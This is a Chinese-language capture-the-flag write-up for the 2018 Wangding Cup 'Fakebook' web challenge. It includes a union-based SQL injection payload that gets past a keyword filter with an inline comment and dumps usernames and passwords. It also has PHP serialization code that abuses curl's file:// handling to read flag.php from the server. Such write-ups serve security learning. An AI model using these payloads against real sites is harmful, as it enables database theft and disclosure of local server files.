网鼎杯 2018 Fakebook

k_du1t
120 阅读2分钟

本文已参与「新人创作礼」活动,一起开启掘金创作之路。

1NDEX

0x00 初试

在这里插入图片描述
一开始有两个选项:一个join,一个login
在这里插入图片描述
此处blog存在过滤
注册完返回首页发现username栏是超链接
单击后发现
url–>
47bdcd94-3a3d-4ae5-af77-4390d01fd436.node4.buuoj.cn:81/view.php?no…
盲猜是注入(讲真我一开始真没有意识先去判断是数字型注入还是字符型注入)
因为手注测试的时候十分的奇怪…
先通过updatexml报错注入得到一些信息在这里插入图片描述
注注注 得到
database: fakebook
table: user
column: no,username,passwd,data
but报错注入时显示出来的数据有限我觉得很麻烦(group_concat压根不够显示data列的)…感觉不是这个思路
果断看wp了

0x01 复现

首先基本功非常不扎实…就嘎了
再复习一下注入有两个小类是数字型和字符型注入

www.php.cn/safe/455989…

&&做题养成扫目录习惯??(不知道是好是坏,实在没思路就扫一下⑧)
/robots.txt -->user.php.bak
已经可以猜到是反序列化了

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
    
}

补充知识:curl_exec()–>ssrf

curl_exec(); curl支持很多协议,有ftp, ftps, http, https, gopher, telnet, dict, file, ldapa

blog.csdn.net/Ethan024/ar…

本地测试一下

在这里插入图片描述
在这里插入图片描述
done

curl部分函数

】curl_init : 初始化一个cURL会话,供curl_setopt(), curl_exec()和curl_close() 函数使用。
# 初始化一个会话
 】curl_setopt : 请求一个url。
# set options 进行一些配置
其中CURLOPT_URL表示需要获取的URL地址,后面就是跟上了它的值。

【*】CURLOPT_RETURNTRANSFER 将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。

【*】curl_exec,成功时返回 TRUE, 或者在失败时返回 FALSE。 然而,如果 CURLOPT_RETURNTRANSFER选项被设置,函数执行成功时会返回执行的结果,失败时返回 FALSE 。

【*】CURLINFO_HTTP_CODE :最后一个收到的HTTP代码。
curl_getinfo:以字符串形式返回它的值,因为设置了CURLINFO_HTTP_CODE,所以是返回的状态码。

原文链接:blog.csdn.net/qq_43622442…

看了dl_wp 是数字型注入(忘了就尬了)
下面很顺畅,常规思路
联合注入就看着很舒服了
tips: union select被过滤了 中间加个注释符/**/就绕过了

payload:
-1%20union/**/select%201,(select(group_concat(concat_ws(%27~%27,no,username,passwd,data)))from(users)),3,4#
在这里插入图片描述
看到第四列data是序列化字符串 ->对应上user.php
显然blog就是我们的利用点了 -->file协议
其实我是真的没扫到flag.php…
payload

$a= new UserInfo();
$a->name='admin';
$a->age=21;
$a->blog='file:///var/www/html/flag.php';
echo(serialize($a));

在这里插入图片描述

在这里插入图片描述

done

avatar
文章
阅读
粉丝